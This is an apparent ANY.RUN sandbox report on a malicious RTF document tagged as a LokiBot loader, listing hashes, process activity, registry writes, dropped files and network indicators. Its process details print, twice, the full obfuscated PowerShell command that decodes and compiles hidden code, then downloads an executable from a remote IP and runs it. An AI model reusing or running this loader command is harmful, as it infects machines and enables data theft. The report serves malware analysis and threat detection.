analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

1.doc

Full analysis: https://app.any.run/tasks/0b34a26a-99c5-4cf3-9c98-f9a7488bf140
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 19, 2019, 10:19:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
trojan
loader
lokibot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

EADA958E304D91D7247D950AED800C16

SHA1:

7A7BFBF4981343A2F7E43BE35DADFE1DBF0751EA

SHA256:

10C4E36639EB4DD7930D39213044BE3D39504A01365BF44D946B416069E56751

SSDEEP:

1536:oZdxVbS1inAAiJCgipC90X3QQQi03536+73mFm61PadpWFrrrdrdiV36nwz3NvH6:oHWJvJvJvJvJCV7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3784)
      • EXCEL.EXE (PID: 2604)
      • EXCEL.EXE (PID: 3804)
      • EXCEL.EXE (PID: 2480)
      • EXCEL.EXE (PID: 2616)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3784)
      • EXCEL.EXE (PID: 2604)
      • EXCEL.EXE (PID: 3804)
      • EXCEL.EXE (PID: 2480)
      • EXCEL.EXE (PID: 2616)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3132)
    • Application was dropped or rewritten from another process

      • yfccff.exe (PID: 3036)
      • yfccff.exe (PID: 2320)
      • yfccff.exe (PID: 3472)
      • yfccff.exe (PID: 2628)
      • yfccff.exe (PID: 3924)
    • Downloads executable files from IP

      • powershell.exe (PID: 3132)
    • Detected artifacts of LokiBot

      • yfccff.exe (PID: 3036)
    • Actions looks like stealing of personal data

      • yfccff.exe (PID: 3036)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3132)
      • powershell.exe (PID: 3980)
      • powershell.exe (PID: 1244)
      • powershell.exe (PID: 3352)
      • powershell.exe (PID: 2516)
      • yfccff.exe (PID: 3036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3132)
      • yfccff.exe (PID: 3036)
    • Loads DLL from Mozilla Firefox

      • yfccff.exe (PID: 3036)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2980)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3784)
      • WINWORD.EXE (PID: 2980)
      • EXCEL.EXE (PID: 2604)
      • EXCEL.EXE (PID: 3804)
      • EXCEL.EXE (PID: 2616)
      • EXCEL.EXE (PID: 2480)
      • excelcnv.exe (PID: 3976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Admin
LastModifiedBy: Admin
CreateDate: 2019:01:07 23:54:00
ModifyDate: 2019:01:07 23:54:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: 4
CharactersWithSpaces: 4
InternalVersionNumber: 57435
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
62
Monitored processes
27
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe csc.exe cvtres.exe no specs #LOKIBOT yfccff.exe excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs yfccff.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs yfccff.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs yfccff.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs yfccff.exe no specs excelcnv.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2980"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3784"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3132"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function k4bd1a7 { param($g7488e) $zf67d = 'x6fec3'; $v9d5a = ''; for ($i = 0; $i -lt $g7488e.length; $i+=2) { $b4548 = [convert]::ToByte($g7488e.Substring($i, 2), 16); $v9d5a += [char]($b4548 -bxor $zf67d[($i / 2) % $zf67d.length]); } return $v9d5a; } $r69851 = '0d450f0b04132b4f1511065e433b6c10105a165146361a400c530b4b314616420f08061d31581200115c08650317155a1b53155e6e39084304090a5058550a04104058465f0102021d3b6c1e6e3958164645431358163d210f5f315b160a114750140d00115d1d5a5557411a253b6c4543135816464543430d540a0c00130b4207110a5058531e11064116162f0b17630c44462206472844090622571c440316101b315812351741585e2b0a074614534a4510470a5f080243430a59052b025e1d1f5d686913581646454313586d22090f7a15460917171b5a5d03170d56140554474a6e753c464543135816464513461a5a0f0643400c57120c00131d4e1200115d587f081133470a162a0a0257345f04170241011e1511115a1651460b025e1d1f5d686913581646454313586d22090f7a15460917171b5a5d03170d56140554474a6e753c464543135816464513461a5a0f0643400c57120c00131d4e1200115d5854090a0f132e5f141116521466140a17561b424e2c0d47284214450f433952021706400b1a46302a5d0c66121743570f650f1f061f58430f0b17131e5a280014630a59120000475416091017130d5f0811435f08500a2a0f572844091106500c1f5d686913581646454313586d22090f7a15460917171b5a7d03170d561405544b075f14144a45265d0c441f350c5a1642465843112a420a280c451d7b03080c4101144a4530560c7a071617760a440917430e585007091056516b6b6f43135816464543130b4207110a5058531e1106411616100a0a57587b0913067e1d5b09171a1b31581235174158520316171f587f081133470a161517001f585f08114340114c034c583e723b6c4543135816464543430d540a0c00130b4207110a50585f081143574c5555544b1a753c4645431358164645183e721646454313581646454313587f081133470a161c035a551a165b452f5c19522a0c014119441f4d08071a525704541b5a075f5001024d06055107064f0752500211511f5d68691358164645431358164645435a1e164e1f050a1e5446585e13315812351741566c03170c1a753c4645431358164645431358161d6869135816464543135816464543135816461706470d4408455208753c4645431358164645431358161b68693e721646454313581646454313587f081133470a16075c07021b0502455e133f531235115c1b77020111560b454e1f050a1e544a4508071a525704541b5a055f5001024d060556530648075f505b014c07565556064d0702515711511f5d68691358164645431358164645435a1e164e045a5749555501430e45162f0b17630c44483f0641171f6b6f431358164645431358164645183e7216464543135816464543135816464543411d4213170d13490d6b6f4313581646454313581646451e3e723b6c454313581646454313581646302a5d0c66121743570f650f1f061345164e302a5d0c6612174a06433b6c454313581646454313581646100a5d0c163c00115c580b4655583e721646454313581646454313585f00454b122e5f141116521466140a17561b424e045a57495555014f131c41350c19565416561d57035416091017132253140a4a1a753c4645431358164645431358161d6869135816464543135816464543135816461706470d4408455208753c4645431358164645431358161b6869135816464543135816464543710142033e3e13285712060b1345161d45534b4b074a45534b1e504a45534b41064618583e721646454313581646454313587f081133470a16130b0e52165701000763175f08110641580b462802410b5e07094d72145a09062b74145904040f1b4b1f5d68691358164645431358164645437e1944150d025f567509151a1b285712060b1f58064a45165d1557080404561c66090c0d471d444a45501a433b6c454313581646454313581646280c451d7b03080c41011e0800141331581235174150575f0152504b5248310c7a164250514b1a581d46551b034807044c4f130d580b040d521f5302350c5a164203174f134b1f5d6869135816464543135816464543411d4213170d13480d6b6f4313581646454313053b6c6c6a430d540a0c00130b4207110a50584512170a5d1f160d5101574957514d10470a5f080243400c442f0b4a3e7216464543135816461e6e39713f6f161741115801450752190451515a134516441d55551d555547583e721646454313581646454313584512170a5d1f161f5701564e54465843600c440f0b041d3d5b16111a08753c464543135816464543135816000a1113505f0811435a580b4655581311165a4510470a7f084b2f561651120d581311164d584301513b6c4543135816464543135816461e6e3958164645431358164645431358164645014a0c53461f56064f0051455e133b59081306410c18320a214a0c534e1617413158483616510b42140c0d54505f4a45511a541657534a08753c46454313581646454313581646454313010404005551581d5b454b501057144c4b494d03515354132616020402014f025f3e4b5a581946574a135d16020402014f025f4b2f561651120d3e1a433b6c454313581646454313581646186e39753c464543135816464543135816140017460a58461c51511d00045e6e3958164645431358161b68694e'; $r698512 = k4bd1a7($r69851); Add-Type -TypeDefinition $r698512; [p9da1e]::d4c31(); Start-Sleep -s 1; $d831d6 = $env:APPDATA; $h2d28b = $d831d6 + '\\yfccff.exe'; If (test-path $h2d28b) {Remove-Item $h2d28b}; $h12ed5 = New-Object System.Net.WebClient; $h12ed5.Headers['User-Agent'] = 'h12ed5'; $h12ed5.DownloadFile('http://139.99.186.18:80/1.exe', $h2d28b); Start-Process -Filepath $h2d28b; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4020"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\55smdild.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3160C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF9E6.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF9E5.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
3036"C:\Users\admin\AppData\Roaming\yfccff.exe" C:\Users\admin\AppData\Roaming\yfccff.exe
powershell.exe
User:
admin
Company:
Goversoft LLC
Integrity Level:
MEDIUM
Description:
Processed Eenumvmidntladed Tomsho
Version:
3.7.8.3
2604"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3980"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function k4bd1a7 { param($g7488e) $zf67d = 'x6fec3'; $v9d5a = ''; for ($i = 0; $i -lt $g7488e.length; $i+=2) { $b4548 = [convert]::ToByte($g7488e.Substring($i, 2), 16); $v9d5a += [char]($b4548 -bxor $zf67d[($i / 2) % $zf67d.length]); } return $v9d5a; } $r69851 = '0d450f0b04132b4f1511065e433b6c10105a165146361a400c530b4b314616420f08061d31581200115c08650317155a1b53155e6e39084304090a5058550a04104058465f0102021d3b6c1e6e3958164645431358163d210f5f315b160a114750140d00115d1d5a5557411a253b6c4543135816464543430d540a0c00130b4207110a5058531e11064116162f0b17630c44462206472844090622571c440316101b315812351741585e2b0a074614534a4510470a5f080243430a59052b025e1d1f5d686913581646454313586d22090f7a15460917171b5a5d03170d56140554474a6e753c464543135816464513461a5a0f0643400c57120c00131d4e1200115d587f081133470a162a0a0257345f04170241011e1511115a1651460b025e1d1f5d686913581646454313586d22090f7a15460917171b5a5d03170d56140554474a6e753c464543135816464513461a5a0f0643400c57120c00131d4e1200115d5854090a0f132e5f141116521466140a17561b424e2c0d47284214450f433952021706400b1a46302a5d0c66121743570f650f1f061f58430f0b17131e5a280014630a59120000475416091017130d5f0811435f08500a2a0f572844091106500c1f5d686913581646454313586d22090f7a15460917171b5a7d03170d561405544b075f14144a45265d0c441f350c5a1642465843112a420a280c451d7b03080c4101144a4530560c7a071617760a440917430e585007091056516b6b6f43135816464543130b4207110a5058531e1106411616100a0a57587b0913067e1d5b09171a1b31581235174158520316171f587f081133470a161517001f585f08114340114c034c583e723b6c4543135816464543430d540a0c00130b4207110a50585f081143574c5555544b1a753c4645431358164645183e721646454313581646454313587f081133470a161c035a551a165b452f5c19522a0c014119441f4d08071a525704541b5a075f5001024d06055107064f0752500211511f5d68691358164645431358164645435a1e164e1f050a1e5446585e13315812351741566c03170c1a753c4645431358164645431358161d6869135816464543135816464543135816461706470d4408455208753c4645431358164645431358161b68693e721646454313581646454313587f081133470a16075c07021b0502455e133f531235115c1b77020111560b454e1f050a1e544a4508071a525704541b5a055f5001024d060556530648075f505b014c07565556064d0702515711511f5d68691358164645431358164645435a1e164e045a5749555501430e45162f0b17630c44483f0641171f6b6f431358164645431358164645183e7216464543135816464543135816464543411d4213170d13490d6b6f4313581646454313581646451e3e723b6c454313581646454313581646302a5d0c66121743570f650f1f061345164e302a5d0c6612174a06433b6c454313581646454313581646100a5d0c163c00115c580b4655583e721646454313581646454313585f00454b122e5f141116521466140a17561b424e045a57495555014f131c41350c19565416561d57035416091017132253140a4a1a753c4645431358164645431358161d6869135816464543135816464543135816461706470d4408455208753c4645431358164645431358161b6869135816464543135816464543710142033e3e13285712060b1345161d45534b4b074a45534b1e504a45534b41064618583e721646454313581646454313587f081133470a16130b0e52165701000763175f08110641580b462802410b5e07094d72145a09062b74145904040f1b4b1f5d68691358164645431358164645437e1944150d025f567509151a1b285712060b1f58064a45165d1557080404561c66090c0d471d444a45501a433b6c454313581646454313581646280c451d7b03080c41011e0800141331581235174150575f0152504b5248310c7a164250514b1a581d46551b034807044c4f130d580b040d521f5302350c5a164203174f134b1f5d6869135816464543135816464543411d4213170d13480d6b6f4313581646454313053b6c6c6a430d540a0c00130b4207110a50584512170a5d1f160d5101574957514d10470a5f080243400c442f0b4a3e7216464543135816461e6e39713f6f161741115801450752190451515a134516441d55551d555547583e721646454313581646454313584512170a5d1f161f5701564e54465843600c440f0b041d3d5b16111a08753c464543135816464543135816000a1113505f0811435a580b4655581311165a4510470a7f084b2f561651120d581311164d584301513b6c4543135816464543135816461e6e3958164645431358164645431358164645014a0c53461f56064f0051455e133b59081306410c18320a214a0c534e1617413158483616510b42140c0d54505f4a45511a541657534a08753c46454313581646454313581646454313010404005551581d5b454b501057144c4b494d03515354132616020402014f025f3e4b5a581946574a135d16020402014f025f4b2f561651120d3e1a433b6c454313581646454313581646186e39753c464543135816464543135816140017460a58461c51511d00045e6e3958164645431358161b68694e'; $r698512 = k4bd1a7($r69851); Add-Type -TypeDefinition $r698512; [p9da1e]::d4c31(); Start-Sleep -s 1; $d831d6 = $env:APPDATA; $h2d28b = $d831d6 + '\\yfccff.exe'; If (test-path $h2d28b) {Remove-Item $h2d28b}; $h12ed5 = New-Object System.Net.WebClient; $h12ed5.Headers['User-Agent'] = 'h12ed5'; $h12ed5.DownloadFile('http://139.99.186.18:80/1.exe', $h2d28b); Start-Process -Filepath $h2d28b; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
180"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\m-ghjgir.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3248C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES2897.tmp" "c:\Users\admin\AppData\Local\Temp\CSC2896.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Total events
5 217
Read events
4 473
Write events
97
Delete events
4

Modification events

(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:91,
Value:
39312C00A40B0000010000000000000000000000
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2980) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1314062359
(PID) Process:(2980) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1314062480
(PID) Process:(2980) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1314062481
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
A40B0000B43D929B3CC8D40100000000
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:b2,
Value:
62322C00A40B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:b2,
Value:
62322C00A40B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2980) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
10
Text files
11
Unknown types
5

Dropped files

PID
Process
Filename
Type
2980WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE999.tmp.cvr
MD5:
SHA256:
3784EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRF178.tmp.cvr
MD5:
SHA256:
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54219L3DYL9GPXMQUKWZ.temp
MD5:
SHA256:
4020csc.exeC:\Users\admin\AppData\Local\Temp\CSCF9E5.tmp
MD5:
SHA256:
4020csc.exeC:\Users\admin\AppData\Local\Temp\55smdild.pdb
MD5:
SHA256:
3160cvtres.exeC:\Users\admin\AppData\Local\Temp\RESF9E6.tmp
MD5:
SHA256:
4020csc.exeC:\Users\admin\AppData\Local\Temp\55smdild.dll
MD5:
SHA256:
4020csc.exeC:\Users\admin\AppData\Local\Temp\55smdild.out
MD5:
SHA256:
2604EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR22D9.tmp.cvr
MD5:
SHA256:
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z84CFBXXXXY6UJRYW0Q9.temp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3132
powershell.exe
GET
200
139.99.186.18:80
http://139.99.186.18/1.exe
AU
executable
458 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3132
powershell.exe
139.99.186.18:80
OVH SAS
AU
malicious

DNS requests

Domain
IP
Reputation
opulenttraesures.com
malicious

Threats

PID
Process
Class
Message
3132
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3132
powershell.exe
A Network Trojan was detected
ET TROJAN Single char EXE direct download likely trojan (multiple families)
3132
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3132
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144